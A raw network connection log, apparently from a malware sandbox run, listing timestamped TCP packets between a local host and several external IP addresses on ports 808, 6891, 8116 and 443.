Oct 28, 2021 05:28:09.905814886 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.905999899 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.907196999 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.977896929 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:09.978491068 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:09.978625059 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:09.979161978 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:09.996552944 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:09.996664047 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:10.074707031 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.074764013 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.074852943 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.075309038 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.079015970 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.079092979 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.163455009 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.163494110 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.203210115 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.242903948 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.246870041 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.246896029 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.543330908 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.543363094 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.543411016 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:10.543442011 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:10.549488068 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:10.625489950 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.625530958 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.625637054 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.625677109 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.628676891 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:10.659806967 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.711721897 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:10.711869001 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.712662935 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.715441942 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.742409945 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:10.765309095 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:10.765341997 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:10.765450954 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.765955925 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.777757883 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.777825117 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:10.796124935 CEST	808	50045	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:10.828361988 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:10.828589916 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:10.829125881 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:10.908432961 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:10.908637047 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:10.909620047 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.020030975 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.020068884 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.020123005 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.020152092 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.026082993 CEST	50046	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.075565100 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.075643063 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.075726986 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.076163054 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.078891993 CEST	8116	50046	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.080456972 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.080569029 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.146087885 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.146141052 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:11.146262884 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.146945000 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.146966934 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:11.246457100 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.246485949 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.626321077 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.626344919 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.626534939 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.629724979 CEST	50047	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:11.643253088 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:11.643444061 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.644253016 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.644272089 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:11.650377989 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.650414944 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:11.650474072 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:11.650491953 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:11.763211012 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.795701981 CEST	6891	50047	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:11.817847013 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.818002939 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.819132090 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.873353958 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.873591900 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.873682022 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.874386072 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.879015923 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.879196882 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:11.933387995 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.933413029 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:11.934125900 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:12.105248928 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:12.105268002 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:12.105350018 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:12.105382919 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:12.107744932 CEST	50049	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:12.162010908 CEST	8116	50049	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:12.224957943 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.225017071 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.225200891 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.226454020 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.226476908 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.340192080 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.340260983 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.340384960 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.350698948 CEST	50048	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.350728035 CEST	443	50048	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.471955061 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.634833097 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:12.634939909 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.635648012 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.746875048 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.747004032 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.747769117 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.747788906 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.754316092 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.754336119 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.754563093 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:12.754580975 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:12.798260927 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:12.798580885 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:12.798696041 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.799263000 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.802968025 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.803087950 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:12.961922884 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:12.965635061 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:12.965661049 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:12.965675116 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.353549004 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.353586912 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.353665113 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.353699923 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.360892057 CEST	50051	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.464040041 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:13.464101076 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:13.464109898 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:13.464126110 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:13.464176893 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:13.467087984 CEST	50050	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:13.467117071 CEST	443	50050	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:13.473244905 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.523751020 CEST	808	50051	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.586086988 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.639302015 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:13.639411926 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.640326023 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.751581907 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.751691103 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.752341986 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.806196928 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:13.806325912 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:13.806394100 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.806900024 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.810681105 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.810801983 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:13.917644024 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.917885065 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:13.917973042 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.918473959 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.922485113 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.922637939 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:13.978154898 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:13.978178978 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:13.978190899 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.083847046 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.087707043 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.087742090 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.087753057 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.087764025 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.087848902 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.361059904 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.361088037 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.361227989 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.361275911 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.368397951 CEST	50052	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.474366903 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.474400997 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.477144003 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:14.480237007 CEST	50053	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:14.534377098 CEST	6891	50052	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.569128990 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.603467941 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.616734982 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.616889954 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.617717028 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.645498037 CEST	808	50053	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:14.664995909 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.665163040 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.665250063 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.666099072 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.673541069 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.673746109 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.720961094 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.720976114 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.721617937 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.769932985 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.770158052 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.771434069 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.891319036 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.891345024 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:14.891446114 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.899280071 CEST	50054	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:14.937417984 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.937500000 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:14.937597990 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.938142061 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.942224026 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.942328930 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:14.946422100 CEST	8116	50054	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.020083904 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.020132065 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:15.020291090 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.020905018 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.020917892 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:15.108172894 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:15.108194113 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:15.489655018 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:15.489692926 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:15.489854097 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:15.489892006 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:15.492863894 CEST	50055	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:15.516782999 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:15.516954899 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.517568111 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.517587900 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:15.530389071 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.530431032 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:15.530531883 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:15.530545950 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:15.613092899 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.658771038 CEST	6891	50055	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:15.661700964 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.661866903 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.662545919 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.710851908 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.710994005 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.711129904 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.711651087 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.714374065 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.714478970 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.762888908 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.762904882 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.951191902 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.951220036 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:15.951350927 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:15.954745054 CEST	50057	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:16.003145933 CEST	8116	50057	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:16.132989883 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.133045912 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.133378983 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.134093046 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.134118080 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.224349976 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.224442959 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.224502087 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.227147102 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.231913090 CEST	50056	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.231951952 CEST	443	50056	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.396164894 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.560667992 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.560806036 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.561635971 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.653700113 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.653827906 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.654658079 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.654675961 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.662717104 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.662744045 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.662889957 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:16.662902117 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:16.727325916 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.727355957 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.727473974 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.728044987 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.732304096 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.732465029 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:16.892255068 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.896635056 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.896656990 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.896670103 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.896682978 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:16.896697044 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.277842999 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.277870893 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.278029919 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.278060913 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.285860062 CEST	50059	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.372701883 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:17.372775078 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:17.372895956 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:17.372957945 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:17.376126051 CEST	50058	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:17.376153946 CEST	443	50058	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:17.395890951 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.450267076 CEST	808	50059	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.490921974 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.562076092 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:17.562769890 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.563386917 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.662792921 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.662892103 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.663615942 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.729343891 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:17.729492903 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:17.729563951 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.730101109 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.733398914 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.733494997 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:17.835119963 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.835289001 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:17.835386038 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.835849047 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.838479042 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.838578939 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:17.899470091 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:17.899518013 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.007303953 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.010051966 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.010077953 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.010088921 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.282104969 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.282138109 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.282279015 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.282318115 CEST	50060	6891	192.168.2.3	45.77.0.96
